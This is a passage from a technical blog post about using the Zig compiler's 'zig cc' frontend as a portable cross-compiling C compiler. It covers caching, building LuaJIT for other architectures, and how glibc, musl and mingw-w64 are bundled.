In file included from /nix/store/8pp3i3hcp7bv0f8jllzqq7gcp9dbzvp9-glibc-2.27-dev/include/stdio.h:27:
In file included from /nix/store/8pp3i3hcp7bv0f8jllzqq7gcp9dbzvp9-glibc-2.27-dev/include/bits/libc-header-start.h:33:
In file included from /nix/store/8pp3i3hcp7bv0f8jllzqq7gcp9dbzvp9-glibc-2.27-dev/include/features.h:452:
/nix/store/8pp3i3hcp7bv0f8jllzqq7gcp9dbzvp9-glibc-2.27-dev/include/gnu/stubs.h:7:11: fatal error: 
      'gnu/stubs-32.h' file not found
# include <gnu/stubs-32.h>
          ^~~~~~~~~~~~~~~~
1 error generated.
[email protected] ~/tmp> clang -o hello hello.c -target aarch64-linux-gnu
In file included from hello.c:1:
In file included from /nix/store/8pp3i3hcp7bv0f8jllzqq7gcp9dbzvp9-glibc-2.27-dev/include/stdio.h:27:
In file included from /nix/store/8pp3i3hcp7bv0f8jllzqq7gcp9dbzvp9-glibc-2.27-dev/include/bits/libc-header-start.h:33:
In file included from /nix/store/8pp3i3hcp7bv0f8jllzqq7gcp9dbzvp9-glibc-2.27-dev/include/features.h:452:
/nix/store/8pp3i3hcp7bv0f8jllzqq7gcp9dbzvp9-glibc-2.27-dev/include/gnu/stubs.h:7:11: fatal error: 
      'gnu/stubs-32.h' file not found
# include <gnu/stubs-32.h>
          ^~~~~~~~~~~~~~~~
1 error generated.

`zig cc` can:

[email protected] ~/tmp> zig cc -o hello.exe hello.c -target x86_64-windows-gnu
[email protected] ~/tmp> wine64 hello.exe
Hello, World!
[email protected] ~/tmp> zig cc -o hello hello.c -target mipsel-linux-musl
[email protected] ~/tmp> qemu-mipsel ./hello
Hello, World!
[email protected] ~/tmp> zig cc -o hello hello.c -target aarch64-linux-gnu
[email protected] ~/tmp> qemu-aarch64 -L ~/Downloads/glibc/multi-2.31/install/glibcs/aarch64-linux-gnu ./hello
Hello, World!

Features of `zig cc`

zig cc is not the main purpose of the Zig project. It merely exposes the already-existing capabilities of the Zig compiler via a small frontend layer that parses C compiler options.

Install simply by unzipping a tarball

Zig is an open source project, and of course can be built and installed from source the usual way. However, the Zig project also has tarballs available on the download page. You can download a 45 MiB tarball, unpack it, and you're done. You can even have multiple versions at the same time, no problem.

Here, rather than downloading the x86_64-linux version, which matches the computer I am currently using, I'll download the Windows version and run it in Wine to show how simple installation is:

[email protected] ~/tmp> wget --quiet https://ziglang.org/builds/zig-windows-x86_64-0.5.0+13d04f996.zip
[email protected] ~/tmp> unzip -q zig-windows-x86_64-0.5.0+13d04f996.zip 
[email protected] ~/tmp> wine64 ./zig-windows-x86_64-0.5.0+13d04f996/zig.exe cc -o hello hello.c -target x86_64-linux
[email protected] ~/tmp> ./hello
Hello, World!

Take a moment to appreciate what just happened here - I downloaded a Windows build of Zig, ran it in Wine, used it to cross-compile for Linux, and then ran the binary natively. Computers are fun!

Compare this to downloading Clang, which has 380 MiB Linux-distribution-specific tarballs. Zig's Linux tarballs are fully statically linked, and therefore work correctly on all Linux distributions. The size difference arises because the Clang tarball ships with more utilities than just a C compiler, as well as pre-compiled static libraries for both LLVM and Clang. Zig does not ship with any pre-compiled libraries; instead it ships with source code, and builds what it needs on-the-fly.

Caching System

The Zig compiler uses a sophisticated caching system to avoid needlessly rebuilding artifacts. I carefully designed this caching system to make optimal use of the file system while maintaining correct semantics - which is trickier than you might think!

The caching system uses a combination of hashing inputs and checking the fstat values of file paths, while being mindful of mtime granularity. This makes it avoid needlessly hashing files, while at the same time detecting when a modified file has the same contents. It always has correct behavior, whether the file system has nanosecond mtime granularity, second granularity, always sets mtime to zero, or anything in between.

You can find a detailed description of the caching system in the 0.4.0 release notes.
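To make the mtime-granularity point concrete, here is a toy C sketch of the fstat-plus-hash idea. This is my illustration, not Zig's actual code; the cache_entry layout and the two-second granularity window are assumptions for demonstration purposes:

/* Toy sketch (not Zig's implementation): reuse a cached content hash
   only when the file's stat info matches the cached entry AND the
   mtime is old enough that a same-tick rewrite could not hide. */
#include <stdio.h>
#include <sys/stat.h>
#include <time.h>

struct cache_entry {
    ino_t inode;   /* identity of the file we hashed */
    off_t size;
    time_t mtime;
    char hash[65]; /* hex digest of the file contents */
};

/* Returns 1 if entry's hash can be reused without rehashing path. */
static int can_skip_hash(const char *path, const struct cache_entry *entry) {
    struct stat st;
    if (stat(path, &st) != 0)
        return 0;
    if (st.st_ino != entry->inode || st.st_size != entry->size ||
        st.st_mtime != entry->mtime)
        return 0;
    /* If mtime falls within the granularity window of 'now', a write in
       the same tick could leave mtime unchanged; rehash to be safe. */
    return time(NULL) - st.st_mtime > 2;
}

int main(void) {
    struct cache_entry e = {0};
    printf("reusable: %d\n", can_skip_hash("hello.c", &e));
    return 0;
}

The real system additionally hashes the inputs and handles file systems whose mtime granularity ranges from nanoseconds down to 'always zero', as described above.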

zig cc makes this caching system available when compiling C code. For simple enough projects, this obviates the need for a Makefile or other build system.

[email protected] ~/tmp> cat foo.c
#include <stdio.h>
#include "another_file.c"
int main(int argc, char **argv) {
#include "printf_many_times.c"
}
[email protected] ~/tmp> cat another_file.c 
void another(void) {}
[email protected] ~/tmp> time zig cc -c foo.c
0.12
[email protected] ~/tmp> time zig cc -c foo.c
0.01
[email protected] ~/tmp> touch another_file.c 
[email protected] ~/tmp> time zig cc -c foo.c
0.01
[email protected] ~/tmp> echo '/* add a comment */' >>another_file.c
[email protected] ~/tmp> time zig cc -c foo.c
0.12
[email protected] ~/tmp> time zig cc -c foo.c
0.01

Here you can see the caching system is smart enough to find dependencies that are included with the preprocessor, and smart enough to avoid a full rebuild when the mtime of another_file.c was updated.

One last thing before I move on. I want to point out that this caching system is not some fluffy bloated feature - rather it is an absolutely critical component to making cross-compiling work in a usable manner. As we'll see below, other compilers ship with pre-compiled, target-specific binaries, while Zig ships with source code only and cross-compiles on-the-fly, caching the result.

Cross Compiling

I have carefully designed Zig since the very beginning to treat cross compilation as a first class use case. Now that the zig cc frontend is available, it brings these capabilities to C code.

I showed you above cross-compiling some simple 'Hello, World!' programs. But now let's try a real-world C project.

Let's try LuaJIT!

[~/Downloads]$ git clone https://github.com/LuaJIT/LuaJIT
[~/Downloads]$ cd LuaJIT
[~/Downloads/LuaJIT]$ ls
COPYRIGHT  doc  dynasm  etc  Makefile  README  src

OK so it uses standard Makefiles. Here we go, first let's make sure it works natively with zig cc.

[~/Downloads/LuaJIT]$ export CC='zig cc'
[~/Downloads/LuaJIT]$ make CC="$CC"
==== Building LuaJIT 2.1.0-beta3 ====
make -C src
make[1]: Entering directory '/home/andy/Downloads/LuaJIT/src'
HOSTCC    host/minilua.o
HOSTLINK  host/minilua
DYNASM    host/buildvm_arch.h
HOSTCC    host/buildvm.o
HOSTCC    host/buildvm_asm.o
HOSTCC    host/buildvm_peobj.o
HOSTCC    host/buildvm_lib.o
HOSTCC    host/buildvm_fold.o
HOSTLINK  host/buildvm
BUILDVM   lj_vm.S
ASM       lj_vm.o
CC        lj_gc.o
BUILDVM   lj_ffdef.h
CC        lj_err.o
CC        lj_char.o
BUILDVM   lj_bcdef.h
CC        lj_bc.o
CC        lj_obj.o
CC        lj_buf.o
CC        lj_str.o
CC        lj_tab.o
CC        lj_func.o
CC        lj_udata.o
CC        lj_meta.o
CC        lj_debug.o
CC        lj_state.o
CC        lj_dispatch.o
CC        lj_vmevent.o
CC        lj_vmmath.o
CC        lj_strscan.o
CC        lj_strfmt.o
CC        lj_strfmt_num.o
CC        lj_api.o
CC        lj_profile.o
CC        lj_lex.o
CC        lj_parse.o
CC        lj_bcread.o
CC        lj_bcwrite.o
CC        lj_load.o
CC        lj_ir.o
CC        lj_opt_mem.o
BUILDVM   lj_folddef.h
CC        lj_opt_fold.o
CC        lj_opt_narrow.o
CC        lj_opt_dce.o
CC        lj_opt_loop.o
CC        lj_opt_split.o
CC        lj_opt_sink.o
CC        lj_mcode.o
CC        lj_snap.o
CC        lj_record.o
CC        lj_crecord.o
BUILDVM   lj_recdef.h
CC        lj_ffrecord.o
CC        lj_asm.o
CC        lj_trace.o
CC        lj_gdbjit.o
CC        lj_ctype.o
CC        lj_cdata.o
CC        lj_cconv.o
CC        lj_ccall.o
CC        lj_ccallback.o
CC        lj_carith.o
CC        lj_clib.o
CC        lj_cparse.o
CC        lj_lib.o
CC        lj_alloc.o
CC        lib_aux.o
BUILDVM   lj_libdef.h
CC        lib_base.o
CC        lib_math.o
CC        lib_bit.o
CC        lib_string.o
CC        lib_table.o
CC        lib_io.o
CC        lib_os.o
CC        lib_package.o
CC        lib_debug.o
CC        lib_jit.o
CC        lib_ffi.o
CC        lib_init.o
AR        libluajit.a
CC        luajit.o
BUILDVM   jit/vmdef.lua
DYNLINK   libluajit.so
LINK      luajit
warning: unsupported linker arg: -E
OK        Successfully built LuaJIT
make[1]: Leaving directory '/home/andy/Downloads/LuaJIT/src'
==== Successfully built LuaJIT 2.1.0-beta3 ====
[~/Downloads/LuaJIT]$ ls
COPYRIGHT  doc  dynasm  etc  Makefile  README  src
[~/Downloads/LuaJIT]$ ./src/
host/         jit/          libluajit.so  luajit        zig-cache/    
[~/Downloads/LuaJIT]$ ./src/luajit 
LuaJIT 2.1.0-beta3 -- Copyright (C) 2005-2020 Mike Pall. http://luajit.org/
JIT: ON SSE2 SSE3 SSE4.1 BMI2 fold cse dce fwd dse narrow loop abc sink fuse
> print(3 + 4)
7
> 

OK so that worked. Now for the real test - can we make it cross compile?

[~/Downloads/LuaJIT]$ git clean -xfdq
[~/Downloads/LuaJIT]$ export CC='zig cc -target aarch64-linux-gnu'
[~/Downloads/LuaJIT]$ export HOST_CC='zig cc'
[~/Downloads/LuaJIT]$ make CC="$CC" HOST_CC="$HOST_CC" TARGET_STRIP="echo"
==== Building LuaJIT 2.1.0-beta3 ====
make -C src
make[1]: Entering directory '/home/andy/Downloads/LuaJIT/src'
HOSTCC    host/minilua.o
HOSTLINK  host/minilua
DYNASM    host/buildvm_arch.h
HOSTCC    host/buildvm.o
HOSTCC    host/buildvm_asm.o
HOSTCC    host/buildvm_peobj.o
HOSTCC    host/buildvm_lib.o
HOSTCC    host/buildvm_fold.o
HOSTLINK  host/buildvm
BUILDVM   lj_vm.S
ASM       lj_vm.o
CC        lj_gc.o
BUILDVM   lj_ffdef.h
CC        lj_err.o
CC        lj_char.o
BUILDVM   lj_bcdef.h
CC        lj_bc.o
CC        lj_obj.o
CC        lj_buf.o
CC        lj_str.o
CC        lj_tab.o
CC        lj_func.o
CC        lj_udata.o
CC        lj_meta.o
CC        lj_debug.o
CC        lj_state.o
CC        lj_dispatch.o
CC        lj_vmevent.o
CC        lj_vmmath.o
CC        lj_strscan.o
CC        lj_strfmt.o
CC        lj_strfmt_num.o
CC        lj_api.o
CC        lj_profile.o
CC        lj_lex.o
CC        lj_parse.o
CC        lj_bcread.o
CC        lj_bcwrite.o
CC        lj_load.o
CC        lj_ir.o
CC        lj_opt_mem.o
BUILDVM   lj_folddef.h
CC        lj_opt_fold.o
CC        lj_opt_narrow.o
CC        lj_opt_dce.o
CC        lj_opt_loop.o
CC        lj_opt_split.o
CC        lj_opt_sink.o
CC        lj_mcode.o
CC        lj_snap.o
CC        lj_record.o
CC        lj_crecord.o
BUILDVM   lj_recdef.h
CC        lj_ffrecord.o
CC        lj_asm.o
CC        lj_trace.o
CC        lj_gdbjit.o
CC        lj_ctype.o
CC        lj_cdata.o
CC        lj_cconv.o
CC        lj_ccall.o
CC        lj_ccallback.o
CC        lj_carith.o
CC        lj_clib.o
CC        lj_cparse.o
CC        lj_lib.o
CC        lj_alloc.o
CC        lib_aux.o
BUILDVM   lj_libdef.h
CC        lib_base.o
CC        lib_math.o
CC        lib_bit.o
CC        lib_string.o
CC        lib_table.o
CC        lib_io.o
CC        lib_os.o
CC        lib_package.o
CC        lib_debug.o
CC        lib_jit.o
CC        lib_ffi.o
CC        lib_init.o
AR        libluajit.a
CC        luajit.o
BUILDVM   jit/vmdef.lua
DYNLINK   libluajit.so
libluajit.so
LINK      luajit
warning: unsupported linker arg: -E
luajit
OK        Successfully built LuaJIT
make[1]: Leaving directory '/home/andy/Downloads/LuaJIT/src'
==== Successfully built LuaJIT 2.1.0-beta3 ====
[~/Downloads/LuaJIT]$ file ./src/luajit 
./src/luajit: ELF 64-bit LSB executable, ARM aarch64, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux-aarch64.so.1, for GNU/Linux 2.0.0, with debug_info, not stripped

It worked! Will it run in QEMU though?

[~/Downloads/LuaJIT]$ qemu-aarch64 -L ~/Downloads/glibc/multi-2.31/install/glibcs/aarch64-linux-gnu ./src/luajit
LuaJIT 2.1.0-beta3 -- Copyright (C) 2005-2020 Mike Pall. http://luajit.org/
JIT: ON fold cse dce fwd dse narrow loop abc sink fuse
> print(4 + 3)
7
> 

Amazing. QEMU never fails to impress me.

Before we move on, I want to show one more thing. You can see above, in order to run the foreign-architecture binary, I had to pass -L ~/Downloads/glibc/multi-2.31/install/glibcs/aarch64-linux-gnu. This is due to the binary being dynamically linked. You can confirm this with the output from file above where it says: dynamically linked, interpreter /lib/ld-linux-aarch64.so.1

Often, when cross-compiling, it is useful to make a static binary. In the case of Linux, for example, this will make the resulting binary able to run on any Linux distribution, rather than only ones with a hard-coded glibc dynamic linker path of /lib/ld-linux-aarch64.so.1.

We can accomplish this by targeting musl rather than glibc:

[~/Downloads/LuaJIT]$ git clean -qxfd
[~/Downloads/LuaJIT]$ export CC='zig cc -target aarch64-linux-musl'
[~/Downloads/LuaJIT]$ make CC="$CC" CXX="$CXX" HOST_CC="$HOST_CC" TARGET_STRIP="echo"
==== Building LuaJIT 2.1.0-beta3 ====
(same output)
==== Successfully built LuaJIT 2.1.0-beta3 ====
[~/Downloads/LuaJIT]$ file src/luajit
src/luajit: ELF 64-bit LSB executable, ARM aarch64, version 1 (SYSV), statically linked, not stripped
[~/Downloads/LuaJIT]$ qemu-aarch64 ./src/luajit
LuaJIT 2.1.0-beta3 -- Copyright (C) 2005-2020 Mike Pall. http://luajit.org/
JIT: ON fold cse dce fwd dse narrow loop abc sink fuse
> print(11 + 22)
33

Here you can see the file command reported statically linked, and in the qemu command, the -L parameter was not needed.

Use Cases of `zig cc`

Alright, so I've given you a taste of what zig cc can do, but now I will list explicitly what I consider to be the use cases:

Experimentation

Sometimes you just want a tool that you can use to try out different things. It can quickly answer questions such as 'What assembly does this code generate on MIPS vs ARM?'. The widely popular Compiler Explorer serves this purpose.

zig cc provides a lightweight tool which can also answer questions such as, 'What happens if I swap out glibc for musl?' and 'How big is this executable when cross-compiled for Windows?'. Here's me using Zig to quickly find out what the maximum UDP packet size is on Linux.

Since Zig is so easy to install - and it actually works everywhere without patches, even Linux distributions such as NixOS - it can often be a more convenient tool for running quick C test programs on your computer.
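For instance, a throwaway program like the one below (my example, not from the article) answers such questions when built with different -target triples:

/* toy probe: how wide are the basic types on this target? */
#include <stdio.h>

int main(void) {
    printf("sizeof(long)      = %zu\n", sizeof(long));
    printf("sizeof(void *)    = %zu\n", sizeof(void *));
    printf("sizeof(long long) = %zu\n", sizeof(long long));
    return 0;
}

Build it with, say, zig cc -o probe probe.c -target i386-linux-musl and again with -target x86_64-linux-musl, then compare the output natively or under QEMU.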

At the time of this writing, LLVM 10 was just released two hours ago. It will take days or weeks for it to become available in various system package managers. But you can already download a master branch build of Zig and play with the new features of Clang/LLVM 10. For example, improved RISC-V support!

[email protected] ~/tmp> zig cc -o hello hello.c -target riscv64-linux-musl
[email protected] ~/tmp> qemu-riscv64 ./hello
Hello, World!

Bundling a C compiler as part of a larger project

With Zig tarballs weighing in at under 45 MiB, zero system dependencies, no configuration, and MIT license, it makes for an ideal candidate when you need to bundle a C compiler along with another project.

For example, maybe you have a programming language that compiles to C. Zig is an obvious choice for what C compiler to ship with your language.

Or maybe you want to make a batteries-included IDE that ships with a compiler.

Lightweight alternative to a cross compilation environment

If you're trying to build something with a large dependency tree, you'll probably want to use a full cross compilation environment, such as mxe.cc or musl.cc.

But if you don't need such a sledgehammer, zig cc could be a useful alternative, especially if your goal is to compile for N different targets. Consider that musl.cc lists different tarballs for each architecture, each weighing in at roughly 85 MiB. Meanwhile Zig weighs in at 45 MiB and it supports all those architectures, plus glibc and Windows.

An alternative to installing MSVC on Windows

You could spend days - literally! - waiting for Microsoft Visual Studio to install, or you could install Zig and VS Code in a matter of minutes.

Under the Hood

If zig cc is built on top of Clang, why doesn't Clang just do this? What exactly is Zig doing on top of Clang to make this work?

The answer is, a lot, actually. I'll go over how it works here.

compiler-rt

compiler-rt is a library that provides 'polyfill' implementations of language-supported features when the target does not have machine code instructions for them. For example, compiler-rt has the function __muldi3 to perform signed 64-bit integer multiplication on architectures that do not have a 64-bit-wide integer multiplication instruction.
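As a concrete illustration (mine, not the article's), the ordinary-looking multiplication below is lowered to a call to __muldi3 when the chosen target lacks a native 64-bit multiply:

/* On a 32-bit target without a 64-bit multiply instruction, the
   compiler emits a call to compiler-rt's __muldi3 for this '*'. */
#include <stdint.h>
#include <stdio.h>

int64_t mul64(int64_t a, int64_t b) {
    return a * b;
}

int main(void) {
    printf("%lld\n", (long long)mul64(123456789, 987654321));
    return 0;
}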

In the GNU world, compiler-rt is named libgcc.

Most C compilers ship with this library pre-built for the target. For example, on an Ubuntu (Bionic) system, with the build-essential package installed, you can find this at /lib/x86_64-linux-gnu/libgcc_s.so.1.

If you download clang+llvm-9.0.1-x86_64-linux-gnu-ubuntu-16.04.tar.xz and take a look around, clang actually does not even ship with compiler-rt. Instead, it relies on the system libgcc noted above. This is one reason that this tarball is Ubuntu-specific and does not work on other Linux distributions, FreeBSD's Linuxulator, or WSL, which have system files in different locations.

Zig's strategy with compiler-rt is that we have our own implementation of this library, written in Zig. Most of it is ported from LLVM's compiler-rt project, but we also have some of our own improvements on top of this.

Anyway, rather than depending on system compiler-rt being installed, or shipping a pre-compiled library, Zig ships its compiler-rt in source form, and lazily builds compiler-rt for the compilation target, and then caches the result using the caching system discussed above.

Zig's compiler-rt is not yet complete. However, completing it is a prerequisite for releasing Zig version 1.0.0.

libc

When C code calls printf, printf has to be implemented somewhere, and that somewhere is libc.

Some operating systems, such as FreeBSD and macOS, have a designated system libc, and it is the kernel syscall interface. On others, such as Windows and Linux, libc is optional, and therefore there are multiple options of which libc to use, if any.

As of the time of this writing, Zig can provide libcs for the following targets:

[email protected] ~> zig targets | jq .libc
[
  "aarch64_be-linux-gnu",
  "aarch64_be-linux-musl",
  "aarch64_be-windows-gnu",
  "aarch64-linux-gnu",
  "aarch64-linux-musl",
  "aarch64-windows-gnu",
  "armeb-linux-gnueabi",
  "armeb-linux-gnueabihf",
  "armeb-linux-musleabi",
  "armeb-linux-musleabihf",
  "armeb-windows-gnu",
  "arm-linux-gnueabi",
  "arm-linux-gnueabihf",
  "arm-linux-musleabi",
  "arm-linux-musleabihf",
  "arm-windows-gnu",
  "i386-linux-gnu",
  "i386-linux-musl",
  "i386-windows-gnu",
  "mips64el-linux-gnuabi64",
  "mips64el-linux-gnuabin32",
  "mips64el-linux-musl",
  "mips64-linux-gnuabi64",
  "mips64-linux-gnuabin32",
  "mips64-linux-musl",
  "mipsel-linux-gnu",
  "mipsel-linux-musl",
  "mips-linux-gnu",
  "mips-linux-musl",
  "powerpc64le-linux-gnu",
  "powerpc64le-linux-musl",
  "powerpc64-linux-gnu",
  "powerpc64-linux-musl",
  "powerpc-linux-gnu",
  "powerpc-linux-musl",
  "riscv64-linux-gnu",
  "riscv64-linux-musl",
  "s390x-linux-gnu",
  "s390x-linux-musl",
  "sparc-linux-gnu",
  "sparcv9-linux-gnu",
  "wasm32-freestanding-musl",
  "x86_64-linux-gnu",
  "x86_64-linux-gnux32",
  "x86_64-linux-musl",
  "x86_64-windows-gnu"
]

In order to provide libc on these targets, Zig ships with a subset of the source files for these projects: glibc, musl, and mingw-w64 (each covered in its own section below).

For each libc, there is a process for upgrading to a new release. This process is a sort of pre-processing step. We still end up with source files, but we de-duplicate non-multi-arch source files into multi-arch source files.

glibc

glibc is the most involved. The first step is building glibc for every target that it supports, which takes upwards of 24 hours and 74 GiB of disk space.

From here, the process_headers tool inspects all the header files from all the targets, and identifies which files are the same across all targets, and which header files are target-specific. They are then sorted into the corresponding directories in Zig's source tree, in:

  • lib/libc/include/generic-glibc/
  • lib/libc/include/$ARCH-linux-$ABI/ (there are multiple of these directories)

Additionally, Linux header files are not included in glibc, and so the same process is applied to Linux header files, with the directories:

  • lib/libc/include/any-linux-any/
  • lib/libc/include/$ARCH-linux-any/

That takes care of the header files, but now we have the problem of dynamic linking against glibc, without touching any system files.

For this, we have the update_glibc tool. Given the path to the glibc source directory, it finds all the .abilist text files and uses them to produce 3 simple but crucial files:

  • vers.txt - the list of all glibc versions.
  • fns.txt - the list of all symbols that glibc provides, followed by the library it appears in (for example libm, libpthread, libc, librt).
  • abi.txt - for each target, for each function, tells which versions of glibc, if any, it appears in.

Together, these files amount to only 192 KB (27 KB gzipped), and they allow Zig to target any version of glibc.

Yes, I did not make a typo there. Zig can target any of the 42 versions of glibc for any of the architectures listed above. I'll show you:

[email protected] ~/tmp> cat rand.zig 
const std = @import("std");
pub fn main() anyerror!void {
    var buf: [10]u8 = undefined;
    _ = std.c.getrandom(&buf, buf.len, 0);
    std.debug.warn("random bytes: {x}\n", .{buf});
}
[email protected] ~/tmp> zig build-exe rand.zig -lc -target native-native-gnu.2.25
[email protected] ~/tmp> ./rand
random bytes: e2059382afb599ea6d29
[email protected] ~/tmp> zig build-exe rand.zig -lc -target native-native-gnu.2.24
lld: error: undefined symbol: getrandom
>>> referenced by rand.zig:5 (/home/andy/tmp/rand.zig:5)
>>>               ./rand.o:(main.0)

Sure enough, if you look at the man page for getrandom, it says:

Support was added to glibc in version 2.25.

When no explicit glibc version is requested, and the target OS is the native (host) OS, Zig detects the native glibc version by inspecting the Zig executable's own dynamically linked libraries, looking for glibc, and checking the version. It turns out you can look for libc.so.6 and then readlink on that, and it will look something like libc-2.27.so. When this strategy does not work, Zig looks at /usr/bin/env, looking for the same thing. Since this file path is hard-coded into countless shebang lines, it's a pretty safe bet to find out the dynamic linker path and glibc version (if any) of the native system!
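Here is a rough C sketch of that readlink trick. It is not Zig's actual code: the hard-coded path is an assumption, and on some distributions libc.so.6 is a regular file rather than a symlink, in which case the fallback strategies above apply.

/* Sketch: resolve the libc.so.6 symlink and read the version out of a
   link target like 'libc-2.27.so'. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>

int main(void) {
    char buf[256];
    ssize_t n = readlink("/lib/x86_64-linux-gnu/libc.so.6", buf, sizeof(buf) - 1);
    if (n < 0) {
        perror("readlink"); /* not a symlink on every system */
        return 1;
    }
    buf[n] = '\0';
    /* expect something like 'libc-2.27.so' */
    if (strncmp(buf, "libc-", 5) == 0 && strlen(buf) > 8)
        printf("glibc version: %.*s\n", (int)(strlen(buf) - 8), buf + 5);
    else
        printf("unexpected link target: %s\n", buf);
    return 0;
}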

zig cc currently does not provide a way to choose a specific glibc version (because C compilers do not provide one), and so Zig chooses the native version when compiling natively, and the default (2.17) when cross-compiling. However, I'm sure this problem can be solved, even when using zig cc - for example with an environment variable, or with an extra command line option that does not conflict with any Clang options.

When you request a certain version of glibc, Zig uses the text files noted above to create dummy .so files to link against, which contain exactly the correct set of symbols (with appropriate name mangling) based on the requested version. The symbols are resolved at runtime by the dynamic linker on the target platform.
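
You can see the effect in the finished binary: each undefined libc symbol is stamped with the glibc version it was resolved against. A rough illustration with binutils (output abbreviated):

~/tmp> objdump -T ./rand | grep getrandom
0000000000000000      DF *UND*  0000000000000000  GLIBC_2.25  getrandom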

In this way, most of libc in the glibc case resides on the target file system. But not all of it! There are still the "C runtime start files":

  • Scrt1.o
  • crti.o
  • crtn.o

These are statically compiled into every binary that dynamically links glibc, and their ABI is therefore Very Very Stable.

And so, Zig bundles a small subset of glibc's source files needed to build these object files from source for every target. The total size of this comes out to 1.4 MiB (252 KB gzipped). I do think there is some room for improvement here, but I digress.

There are a couple of patches applied to this small subset of glibc source files, simplifying them so they do not pull in too many .h files - the end result we need is a few bare-bones object files, not all of glibc.

And finally, we certainly do not ship glibc's build system with Zig! I manually inspected, audited, and analyzed glibc's build system, and then hand-wrote code in the Zig compiler that hooks into Zig's caching system and performs a minimal build of only these start files, as needed.

musl

The process for preparing musl to ship with Zig is much simpler by comparison.

It still involves building musl for every target architecture that it supports, but in this case only the install-headers target has to be run, which takes less than a minute even for all targets combined.
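
The per-target step is roughly the following (a hypothetical invocation - musl's build goes through configure first, and the exact flags may differ by release):

~/tmp> ./configure --target=aarch64 --prefix=$PREFIX
~/tmp> make install-headers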

The same process_headers tool used for the glibc headers is used on the musl headers:

  • lib/libc/include/generic-musl/
  • lib/libc/include/$ARCH-linux-$ABI/ (there are multiple of these directories)

Unlike glibc, musl supports building statically. Zig currently assumes a static libc when musl is chosen, and does not support dynamically linking against musl, although that could potentially be added in the future.
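
In practice this means a single command yields a fully static Linux executable. A quick illustration (hypothetical session; hello.c is any ordinary C file):

~/tmp> zig cc -target x86_64-linux-musl hello.c -o hello
~/tmp> ldd ./hello
        not a dynamic executable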

And so for musl, Zig actually bundles most - but still not all - of musl's source files. Everything in arch, crt, compat, src, and include gets copied in.

Again much like glibc, I carefully studied musl's build system, and then hand-coded logic in the Zig compiler to build these source files. In musl's case it is simpler: just a bit of logic based on file extensions, and on whether a generic file should be overridden by an architecture-specific one. The only file that needs to be patched (by hand) is version.h, which is normally generated during the configure phase of musl's build system.

I really appreciate Rich Felker's efforts to make musl simple to utilize in this way, and he has been incredibly helpful in the #musl IRC channel when I ask questions. I proudly sponsor Rich Felker for $150/month.

mingw-w64

mingw-w64 was an absolute joy to support in Zig. The beautiful thing about this project is that it has already been transitioning to a single set of header files that applies to all architectures (using #ifdefs only where needed). That one set of headers is sufficient to support all four architectures: arm, aarch64, x86, and x86_64.

So for updating headers, all we have to do is build mingw-w64, then:

mv $INSTALLPREFIX/include $ZIGSRC/lib/libc/include/any-windows-any

After doing this for all 3 libcs, the libc/include directory looks like this:

aarch64_be-linux-any   i386-linux-musl           powerpc-linux-any
aarch64_be-linux-gnu   mips64el-linux-any        powerpc-linux-gnu
aarch64-linux-any      mips64el-linux-gnuabi64   powerpc-linux-musl
aarch64-linux-gnu      mips64el-linux-gnuabin32  riscv32-linux-any
aarch64-linux-musl     mips64-linux-any          riscv64-linux-any
any-linux-any          mips64-linux-gnuabi64     riscv64-linux-gnu
any-windows-any        mips64-linux-gnuabin32    riscv64-linux-musl
armeb-linux-any        mips64-linux-musl         s390x-linux-any
armeb-linux-gnueabi    mipsel-linux-any          s390x-linux-gnu
armeb-linux-gnueabihf  mipsel-linux-gnu          s390x-linux-musl
arm-linux-any          mips-linux-any            sparc-linux-gnu
arm-linux-gnueabi      mips-linux-gnu            sparcv9-linux-gnu
arm-linux-gnueabihf    mips-linux-musl           x86_64-linux-any
arm-linux-musl         powerpc64le-linux-any     x86_64-linux-gnu
generic-glibc          powerpc64le-linux-gnu     x86_64-linux-gnux32
generic-musl           powerpc64-linux-any       x86_64-linux-musl
i386-linux-any         powerpc64-linux-gnu
i386-linux-gnu         powerpc64-linux-musl

When Zig generates a C command line to send to clang, it adds the appropriate -I include paths for the target. For example, if the target is aarch64-linux-musl, the following command line parameters are appended:

  • -I$LIB/libc/include/aarch64-linux-musl
  • -I$LIB/libc/include/aarch64-linux-any
  • -I$LIB/libc/include/generic-musl
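
Putting that together, the eventual Clang invocation for this target includes something like the following (abbreviated and hypothetical; hello.c stands in for whatever is being compiled):

clang -target aarch64-linux-musl -I$LIB/libc/include/aarch64-linux-musl -I$LIB/libc/include/aarch64-linux-any -I$LIB/libc/include/generic-musl -c hello.c -o hello.o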

Anyway, back to mingw-w64.

Again, Zig includes a subset of source files from mingw-w64 with a few patches applied to make things compile successfully.

The Zig compiler code that builds mingw-w64 from source files emulates only the parts of the build system that are needed for this subset. This includes preprocessing .def.in files to get .def files, and then in turn using LLD to generate .lib files from the .def files, which allows Zig to provide .lib files for any Windows DLL, such as kernel32.dll or even opengl32.dll.
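
For reference, a module-definition (.def) file is a tiny text format. A minimal hypothetical example for an OpenGL import library:

LIBRARY OPENGL32.dll
EXPORTS
    glBegin
    glEnd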

Invoking Clang Without a System Dependency

Since Zig already links against Clang libraries for the translate-c feature, it did not cost much more to expose Clang's main() entry point from Zig. So that's exactly what we do:

  • llvm-project/clang/tools/driver/driver.cpp is copied to $ZIGGIT/src/zig_clang_driver.cpp
  • llvm-project/clang/tools/driver/cc1_main.cpp is copied to $ZIGGIT/src/zig_clang_cc1_main.cpp
  • llvm-project/clang/tools/driver/cc1as_main.cpp is copied to $ZIGGIT/src/zig_clang_cc1as_main.cpp

The following patch is applied:

--- a/src/zig_clang_driver.cpp
+++ b/src/zig_clang_driver.cpp
@@ -206,8 +205,6 @@
                     void *MainAddr);
 extern int cc1as_main(ArrayRef<const char *> Argv, const char *Argv0,
                       void *MainAddr);
-extern int cc1gen_reproducer_main(ArrayRef<const char *> Argv,
-                                  const char *Argv0, void *MainAddr);
 
 static void insertTargetAndModeArgs(const ParsedClangName &NameParts,
                                     SmallVectorImpl<const char *> &ArgVector,
@@ -330,19 +327,18 @@
   if (Tool == "-cc1as")
     return cc1as_main(makeArrayRef(ArgV).slice(2), ArgV[0],
                       GetExecutablePathVP);
-  if (Tool == "-cc1gen-reproducer")
-    return cc1gen_reproducer_main(makeArrayRef(ArgV).slice(2), ArgV[0],
-                                  GetExecutablePathVP);
   // Reject unknown tools.
   llvm::errs() << "error: unknown integrated tool '" << Tool << "'. "
                << "Valid tools include '-cc1' and '-cc1as'.\n";
   return 1;
 }
 
-int main(int argc_, const char **argv_) {
+extern "C" int ZigClang_main(int argc_, const char **argv_);
+int ZigClang_main(int argc_, const char **argv_) {
   noteBottomOfStack();
